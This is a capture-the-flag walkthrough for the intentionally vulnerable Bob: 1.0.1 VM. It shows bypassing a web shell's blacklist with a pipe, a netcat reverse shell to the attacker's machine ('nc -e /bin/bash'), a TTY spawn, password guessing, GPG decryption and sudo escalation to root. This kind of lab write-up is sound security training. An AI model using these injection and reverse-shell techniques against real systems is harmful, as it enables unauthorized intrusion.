Hello friends! Today we are going to take another
CTF challenge known as Bob: 1.0.1 The credit for making this vm machine goes to
“c0rruptedb1t” and it is another capture the flag challenge in which our goal is
to gain root access and capture the flag to complete the challenge. You can
download this VM here.
Let’s
Breach!!!
Let’s start from
getting to know the IP of VM (Here, I have it at 192.168.1.109 but you will have to find your own)
netdiscover
nmap -A 192.168.1.109
Awesome!! Nmap has done
remarkable job by dumbing the details of service running on open port 80. It
also found the robot.txt and it showed us that it contains /login.php, /dev_shell.php /lat_memo.html, /passwords.html
Knowing port 80 is open in victim’s network
I preferred to explore his IP in browser.
After this I was curious about the links
inside the robots.txt so, I went on to open those. One that drew my attention
was
http://192.168.1.109/dev_shell.php
It seemed like a shell, so I tried to run
“ls” command.
It didn’t work and I got a Denied message
“Get out skid lol”
My next try was pwd command. But even then,
there was no success.
At
last! I had a command which could run in this shell. Now all I have to do is
bypass it on order to generate a shell.
I tried “id | ls” and I have the result for the both commands. I have
successfully bypassed with a single pipe (|)
As I ran the “ls” command, I saw a file
“dev_shell.php.bak”. I save that file on my system.
As I ran the “ls” command, I saw a file
“dev_shell.php.bak”. I save that file on my system.
After downloading the “dev_shell.php.bak”,
I opened the file using cat command as shown in the screenshot given below.
You can see variable $bad_words, it is the list of commands which were banned in the
dev_shell.php we were messing with earlier.
You can see that the netcat command is not
allowed but “nc” is not in the list. So, I decided to get the shell using nc. I
generated a shell using this command:
id |
nc -e /bin/bash 192.168.1.132 6000
Here, 192.168.1.132 is the IP of My Kali
Before running this command, Start a netcat
listener on the port 6000 to grab the shell which will be generated using the
command mentioned before.
nc
-lvp 6000
As soon as I ran the command on the
browser, I got a limited shell on my netcat listener. Now let’s spawn a TTY
Shell
python
-c 'import pty;pty.spawn("/bin/bash")'
Ok this gave us a proper shell. After changing
to home directory, we found the following users
After browsing through the user
directories, I found something in the Elliot’s
directory. I found a text file named “theadminisdumb.txt”
After opening, it was a description of the
employees in the IT department and specially the admin. He says that the admin
is dumb because he sets a default password on the systems “Qwerty”.
This gave us a hint that one of the users
must have the password as Qwerty. Only way to find out is brute forcing
manually as shown below.
su
[username]
I found out that User jc has the password Qwerty. So, logged in using the jc
credentials.
Now again let’s look for another clue in
the user directories. After looking for a while. I found another text file in
user bob’s Document Directory called staff.txt.
But we also found a login.txt.gpg
but GPG or GNU Privacy Guard are the encrypted file, we are going to need a
passphrase to decrypt the text file. Our next Target is to get that passphrase.
We also got a Directory named Secret.
Let’s get into that.
There was folder inside a folder and go on
till we have a notes.sh file.
The Path for that file is /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh
On finding that notes.sh, I opened it using
cat command. It contained Message:
Harry Potter is my faviorite
Are you the real me?
Right, I'm ordering pizza this is going
nowhere
People just don't get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
Cucumber
Rest now your eyes are sleepy
Are
you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em
We tried a couple combination from the
words in them but after some multiple guesses. Then it struck me that I could
try to use the first letter of every sentence and create a word, after doing
that I got the word “HARPOCRATES” On
googling it I found that it has do something with secrets and password. This
made me sure that it is the passphrase for the gpg file.
So time to decrypt the gpg file
gpg
--batch –passphrase HARPOCRATES -d login.txt.gpg
Great! We have the bob login credentials!
Username: bob
Password: b0bcat_
Now that we have the login credentials
let’s login into bob’s shell
After logging in I ran the command sudo -l which showed that we have “ALL”
Permission. Now all we have to do is get on to root shell which can be done
using command sudo su
0 comments:
Post a Comment